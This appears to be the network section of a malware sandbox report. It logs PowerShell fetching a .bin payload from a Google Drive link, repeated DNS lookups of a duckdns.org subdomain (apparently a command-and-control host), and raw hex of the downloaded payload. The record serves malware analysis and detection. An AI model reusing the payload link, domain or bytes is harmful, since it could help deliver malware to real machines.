                                    Sep 2, 2024 16:20:44.826884985 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.826890945 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.826934099 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.827698946 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.827761889 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.830749989 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.830823898 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.830950975 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.831011057 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.831017017 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.831073999 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.831407070 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.831459999 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.831466913 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.831510067 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.832056046 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.832098007 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.837974072 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.838031054 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.838032961 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.838044882 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.838078022 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.838104963 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.838303089 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.838352919 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.838360071 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.838402987 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.839051962 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.839099884 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.854830027 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.854902029 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.854918957 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.854965925 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.855313063 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.855381012 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.855389118 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.855431080 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.855890036 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.855956078 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.855962038 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.856008053 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.861237049 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.861321926 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.861350060 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.861397982 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.862076998 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.862118959 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.862128973 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.862139940 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.862155914 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.862189054 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.862915993 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.862967014 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.863575935 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.863625050 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.863631010 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.863672018 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.863976002 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.864018917 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.864023924 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.864064932 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.864912987 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.864969969 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.865009069 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.865051031 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.868716955 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.868797064 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.868972063 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.869083881 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.869252920 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.869302034 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.869307995 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.869348049 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.869755030 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.869800091 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.869807005 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.869846106 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.872057915 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.872107029 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.872113943 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.872154951 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.872812033 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.872864008 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.872869968 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.872914076 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.873650074 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.873697042 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.878849030 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.878906012 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.878954887 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.878995895 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.879002094 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.879044056 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.879682064 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.879724979 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.879729986 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.879745007 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.879772902 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.879815102 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.903315067 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.903438091 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.903486013 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.903559923 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.903805971 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.903850079 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.903858900 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.903902054 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.904316902 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.904361010 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.904367924 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.904405117 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905311108 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.905360937 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905360937 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.905379057 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.905405998 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905445099 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905450106 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.905492067 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905527115 CEST49729443192.168.2.7142.250.181.225
                                    Sep 2, 2024 16:20:44.905570984 CEST44349729142.250.181.225192.168.2.7
                                    Sep 2, 2024 16:20:44.905668974 CEST49729443192.168.2.7142.250.181.225

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 2, 2024 16:20:40.096498013 CEST6171553192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:40.103375912 CEST53617151.1.1.1192.168.2.7
                                    Sep 2, 2024 16:20:41.197871923 CEST5004053192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:41.205425024 CEST53500401.1.1.1192.168.2.7
                                    Sep 2, 2024 16:20:46.458014011 CEST6109353192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:47.461338043 CEST6109353192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:48.471894026 CEST6109353192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:50.488946915 CEST6109353192.168.2.71.1.1.1
                                    Sep 2, 2024 16:20:52.272173882 CEST53610931.1.1.1192.168.2.7
                                    Sep 2, 2024 16:20:52.272193909 CEST53610931.1.1.1192.168.2.7
                                    Sep 2, 2024 16:20:52.272203922 CEST53610931.1.1.1192.168.2.7
                                    Sep 2, 2024 16:20:52.272213936 CEST53610931.1.1.1192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 2, 2024 16:20:40.096498013 CEST192.168.2.71.1.1.10x4694Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:41.197871923 CEST192.168.2.71.1.1.10x9d7fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:46.458014011 CEST192.168.2.71.1.1.10x64bbStandard query (0)a458386d9.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:47.461338043 CEST192.168.2.71.1.1.10x64bbStandard query (0)a458386d9.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:48.471894026 CEST192.168.2.71.1.1.10x64bbStandard query (0)a458386d9.duckdns.orgA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:50.488946915 CEST192.168.2.71.1.1.10x64bbStandard query (0)a458386d9.duckdns.orgA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 2, 2024 16:20:40.103375912 CEST1.1.1.1192.168.2.70x4694No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:41.205425024 CEST1.1.1.1192.168.2.70x9d7fNo error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:52.272173882 CEST1.1.1.1192.168.2.70x64bbServer failure (2)a458386d9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:52.272193909 CEST1.1.1.1192.168.2.70x64bbServer failure (2)a458386d9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:52.272203922 CEST1.1.1.1192.168.2.70x64bbServer failure (2)a458386d9.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                    Sep 2, 2024 16:20:52.272213936 CEST1.1.1.1192.168.2.70x64bbServer failure (2)a458386d9.duckdns.orgnonenoneA (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • drive.google.com
                                    • drive.usercontent.google.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749726142.250.184.2384437800C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-02 14:20:40 UTC216OUTGET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: drive.google.com
                                    Cache-Control: no-cache
                                    2024-09-02 14:20:41 UTC1610INHTTP/1.1 303 See Other
                                    Content-Type: application/binary
                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                    Pragma: no-cache
                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                    Date: Mon, 02 Sep 2024 14:20:41 GMT
                                    Location: https://drive.usercontent.google.com/download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download
                                    Strict-Transport-Security: max-age=31536000
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    Cross-Origin-Opener-Policy: same-origin
                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                    Content-Security-Policy: script-src 'nonce-DMN4-Su6hVZyZ_GLk_pZGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                    Server: ESF
                                    Content-Length: 0
                                    X-XSS-Protection: 0
                                    X-Frame-Options: SAMEORIGIN
                                    X-Content-Type-Options: nosniff
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.749729142.250.181.2254437800C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-02 14:20:41 UTC258OUTGET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Cache-Control: no-cache
                                    Host: drive.usercontent.google.com
                                    Connection: Keep-Alive
                                    2024-09-02 14:20:44 UTC4860INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Content-Security-Policy: sandbox
                                    Content-Security-Policy: default-src 'none'
                                    Content-Security-Policy: frame-ancestors 'none'
                                    X-Content-Security-Policy: sandbox
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Resource-Policy: same-site
                                    X-Content-Type-Options: nosniff
                                    Content-Disposition: attachment; filename="WdxiRcGrvsVlRYCbtLvre252.bin"
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: false
                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                    Accept-Ranges: bytes
                                    Content-Length: 494656
                                    Last-Modified: Fri, 05 Jul 2024 08:47:24 GMT
                                    X-GUploader-UploadID: AD-8ljtQZaeEmVLw_wEuNZaVS2UHGs5lgIIKGgdkSc4ZdguIXR47wUvdLZVPB9BTsE8pP8kX0A
                                    Date: Mon, 02 Sep 2024 14:20:44 GMT
                                    Expires: Mon, 02 Sep 2024 14:20:44 GMT
                                    Cache-Control: private, max-age=0
                                    X-Goog-Hash: crc32c=kmxt9A==
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close
                                    2024-09-02 14:20:44 UTC4860INData Raw: 17 06 a8 47 2b db e2 27 21 a6 f2 65 1b 28 40 90 fa 3f 12 90 88 9a 3b 60 3f bb 04 fb b0 1c bd 94 11 2b 1f 41 fd 95 6f 69 b0 fd 86 5c 05 ae f8 09 f1 92 e0 41 77 07 5d 7b 47 a4 a2 46 85 fc cc e9 c2 4c 3b 00 6f 0f 6e ec 3c 8d 3e 66 dd 17 05 70 eb e7 94 a4 ec bf d3 32 0b 27 87 b0 60 dc 96 58 03 e9 6c da 46 48 f5 2e dd 97 74 a2 56 6a e2 7d 02 e5 86 30 eb 7c de 4a 85 90 54 29 2f 3d b2 68 e9 1f c9 a3 72 75 99 8f 8f e1 fb c7 2d 55 41 5f 2a 37 15 cd 99 b7 49 ab 09 43 ef ed d0 b8 0a 09 07 f4 ae 2a cc 61 39 6b 67 14 96 94 2e d3 89 88 d7 7e e9 e9 3e 0f 82 9d e1 31 aa b9 8b 64 dd cb 15 74 e9 b2 72 e9 72 be 72 1e 21 2c 9c 31 cf ae d2 4f e2 f5 0e 00 46 75 60 b7 dd 88 67 f2 2c ae 73 ab 36 6f 1d ec 15 42 a5 c2 ca 6d 72 69 12 16 85 22 0b fc b8 bd e2 56 97 5e 2b 7e 3d 18 e4
                                    Data Ascii: G+'!e(@?;`?+Aoi\Aw]{GFL;on<>fp2'`XlFH.tVj}0|JT)/=hru-UA_*7IC*a9kg.~>1dtrrr!,1OFu`g,s6oBmri"V^+~=
                                    2024-09-02 14:20:44 UTC4860INData Raw: 11 dc 07 de ea 0e 95 c5 31 21 b1 63 0d cc cb 19 b6 d9 51 d2 7a a5 c0 3a 67 f4 62 57 86 e6 2f a5 ef 4d c6 a1 9e 1a 06 9c d1 fb f6 d7 56 a2 5b 6a 90 d3 15 4b af 98 71 a3 40 73 7a 39 93 c7 02 53 12 19 6a d1 35 34 28 be 13 dc 02 6f e2 5b 43 e8 81 6b 95 7d 5f 5e 6a 48 da 6b ea f8 0a 2d a7 fe 55 33 8f 05 ee 7a 53 f4 fd 32 42 b3 ab 77 be 24 52 78 fe 94 4b a2 06 ac ce 33 e4 7b dc 73 af 75 77 2a d8 94 05 3a 72 dc e5 19 89 0b fb de 66 61 1c 9c 3c c8 56 e9 24 2a 76 e9 eb 24 e9 3a 85 c3 c7 f7 1d e7 31 0c b2 72 83 b3 eb aa 4b b6 f8 45 d8 e2 be fb 75 d2 0f fb f5 53 04 9d 66 9c 91 4f c8 cf a7 c1 e5 3c 6d 50 72 fe c2 b7 8e af b6 85 c3 69 3c 44 35 5e 2c ae 52 7a 4f 98 ba 4b e3 c1 43 2a 0b 82 24 4b 69 35 e3 cb e1 42 e7 77 80 bc 19 69 bb b6 d4 cc 59 66 7d 95 67 e4 bc 4f 31
                                    Data Ascii: 1!cQz:gbW/MV[jKq@sz9Sj54(o[Ck}_^jHk-U3zS2Bw$RxK3{suw*:rfa<V$*v$:1rKEuSfO<mPri<D5^,RzOKC*$Ki5BwiYf}gO1
                                    2024-09-02 14:20:44 UTC120INData Raw: fc 5e 33 ae d3 0f a2 f5 53 05 9d 5d 65 6e b0 a8 37 75 df 7e 89 bd df 62 16 55 3d 7f 47 6c 0a 8e 79 be f9 5e 5e a7 30 37 86 45 c8 37 8d 29 77 1e 41 0b 7d 00 e2 24 21 ce 01 b1 aa 2b 82 7f aa df e6 f6 be 56 ba 32 66 82 b1 c8 26 bc d4 36 0a aa af fe 40 0e 32 c6 0a 6a 1c e6 31 c7 a2 67 41 8c 9d 97 16 3b a7 e9 74 e4 56 88 d8 b5 af 89 a6 ff 0f 05 ba 4b 16 17 36 ae
                                    Data Ascii: ^3S]en7u~bU=Gly^^07E7)wA}$!+V2f&6@2j1gA;tVK6
                                    2024-09-02 14:20:44 UTC1323INData Raw: 23 1c 46 2f 3c 99 70 14 ed f3 ca a0 53 09 ab 12 9d fa c6 bc fa 58 91 a6 03 6b f5 47 c0 a8 b6 a2 62 a1 ae 46 e1 51 ef 4e 97 b1 9f 9b 2a a7 a1 6c f7 ea 98 00 40 a0 1e 42 7b 64 4c f5 eb 9b 43 06 a2 22 44 71 c2 61 4a 8f e4 ce 7d a8 8a 94 b6 cd a4 0f 4e cc d5 bc e1 39 09 38 76 27 75 8f 6d ee 07 61 74 83 a5 c6 85 f8 64 94 d0 42 e8 8a c7 6d 38 9d af 4c 2a a6 44 55 63 3f 0a 0a 23 2e 0c 95 a0 ac de 42 59 5f a5 05 1c 3c 59 0b 1c 37 32 14 f1 7c ad 5b 60 2b 05 b2 20 d9 97 ae 7e b0 8b de 7c 77 5d 92 87 cc 67 66 12 e5 a1 0e ee 51 bb f1 13 9c a1 40 1f 7c 37 dd 48 d9 45 ce 7d 0b 77 71 59 17 c6 6c 50 80 fa 8a 57 5e c4 9c cf 6f a9 08 a6 61 21 8d c7 67 95 19 39 3f 58 59 48 9b 0f 07 a8 06 4b 65 1e f6 33 bc 79 64 09 63 89 10 c6 d9 7f 3f 1b 48 7d 28 16 71 65 ac 81 0e 25 ba 41
                                    Data Ascii: #F/<pSXkGbFQN*l@B{dLC"DqaJ}N98v'umatdBm8L*DUc?#.BY_<Y72|[`+ ~|w]gfQ@|7HE}wqYlPW^oa!g9?XYHKe3ydc?H}(qe%A
                                    2024-09-02 14:20:44 UTC1390INData Raw: c4 e7 e3 74 bb 1f 1d 82 f2 ae ed 28 72 fa a8 8a 03 c6 21 14 d7 68 90 24 81 a0 a1 dd 39 49 0c 75 fe 69 32 5d 56 21 41 7a 75 62 c8 8a 1e 68 cc 21 c8 8c 57 35 64 10 d4 3b 8e bc 73 dd 27 8a 0b 16 ae e7 b9 f0 1b d0 3b d8 94 77 a6 dd db 18 7a fb a6 85 09 9e 8b 1c ff 8a 23 d8 03 50 25 fe e7 ed af 16 ad 3d 8d 46 1d e2 e7 04 42 7e 4e e3 b3 41 64 b4 49 25 6a db 3a 3a ff 7c 59 62 a2 8e 37 c8 9e 59 44 e4 4b c6 f7 8c c1 04 d9 65 19 b8 16 6e cc 80 b8 b8 47 b7 24 6d bf 2c 76 58 14 9e e3 c6 56 52 85 cf 60 7f 43 4f 59 48 e4 af de 82 9f 09 75 cf 8c 7f 56 cb 4f a7 b5 7d 63 db 6d 5c 1e bc 6b 90 70 64 f5 de 00 18 95 4b 3f 87 22 85 e3 8f 8a 89 be c8 dd 76 50 39 01 7f 61 e5 ff e8 0b 60 94 bb 24 52 f1 ff 38 b0 95 f3 2b f8 6f 75 12 80 37 d3 48 a8 54 9a b8 a4 a0 fe 1a fc 43 54 92
                                    Data Ascii: t(r!h$9Iui2]V!Azubh!W5d;s';wz#P%=FB~NAdI%j::|Yb7YDKenG$m,vXVR`COYHuVO}cm\kpdK?"vP9a`$R8+ou7HTCT
                                    2024-09-02 14:20:44 UTC1390INData Raw: 6f 4e ff 93 0c a9 bc d0 dc e7 99 dd 6b c1 7c d8 29 6b d0 c8 ab 3b 51 ae d8 78 b3 a7 57 58 5b c6 b9 84 8d a3 b7 0a 2d 1a 94 b7 4b 82 6a e2 7d 89 a9 a2 10 d0 b3 a9 64 d7 1b 9a c1 01 d9 4d 97 e4 c7 f8 63 71 04 c0 aa 9c bc 05 74 e3 b3 16 f4 13 ac 3d 64 14 27 ad 1d 64 a5 01 dd 59 cb 81 99 8c 3d e6 b0 13 ec c1 01 68 46 39 3f a4 eb ed fa 52 18 68 73 ef 01 48 1c 0b 32 6f e9 63 99 39 34 e6 ec 95 9c f9 43 4f 13 e2 1b 0b d1 10 c7 91 1e 7d c1 2e 6f aa 05 18 47 b8 f5 f8 35 a3 c5 fa 18 de 24 fe ef b4 e9 95 d4 36 a4 64 ec 38 d7 e3 4c d8 b6 49 6a 34 a3 c8 d7 71 3d ad e9 f1 3a ce bc 01 44 8f 5e b0 a0 2a 8d 09 b9 37 5f 54 7e 73 68 22 10 c9 71 ae 72 84 dd 0b 68 30 6d 97 6b 27 56 d5 41 6f e0 15 8f ae dd e9 fe af 19 61 34 ff 1b 62 8b 38 9c b0 78 e8 38 1f 52 6e 37 f8 5a 29 12
                                    Data Ascii: oNk|)k;QxWX[-Kj}dMcqt=d'dY=hF9?RhsH2oc94CO}.oG5$6d8LIj4q=:D^*7_T~sh"qrh0mk'VAoa4b8x8Rn7Z)
                                    2024-09-02 14:20:44 UTC1390INData Raw: eb d3 06 6c be cc 8c dc 3c 20 68 6b 1d 88 5d de 9d c9 0b 39 cd 16 c5 ba bd bd 1f c9 46 6c 1e a7 da 70 f7 59 13 fa ed ba fe 9f 57 4a 59 fa 51 18 14 d6 d4 9c 64 0d e4 fa 27 25 cd b1 4f cc 4d 9b c2 56 16 1b 69 36 56 f0 d9 a0 91 f5 3f b2 a3 40 ed 04 f1 b6 1d 63 9e 42 d0 83 15 fb ec 1a d7 7d b1 df 76 6a b7 1c 2b 0f 3c 79 90 63 e9 2a de a6 31 ef 11 0d 76 a1 30 0e 28 88 51 44 9a a5 6d d3 cc 69 4c b8 f8 f2 f8 c1 8d e5 df 92 dd f4 0e c5 68 36 0f 2d 95 1e 1e 87 ef 22 53 94 35 c1 2e 4b 4a 5d 1e 31 fc 30 36 9d d7 f6 fb 32 a3 8b 9d e7 f3 09 c7 72 c1 12 06 e0 8e be bb 86 71 5b 13 34 15 6c 89 23 87 e6 32 57 67 09 88 a5 48 ca ae 01 f5 2e dd 1c bc 4a 6a 8e 1d 82 52 6e 48 d8 a2 93 21 b5 0e 56 0a ea 69 c3 c6 4c ef 8b 82 26 b8 29 84 ad 51 a6 71 43 08 6f f1 c8 bc 14 be 73 03
                                    Data Ascii: l< hk]9FlpYWJYQd'%OMVi6V?@cB}vj+<yc*1v0(QDmiLh6-"S5.KJ]1062rq[4l#2WgH.JjRnH!ViL&)QqCos
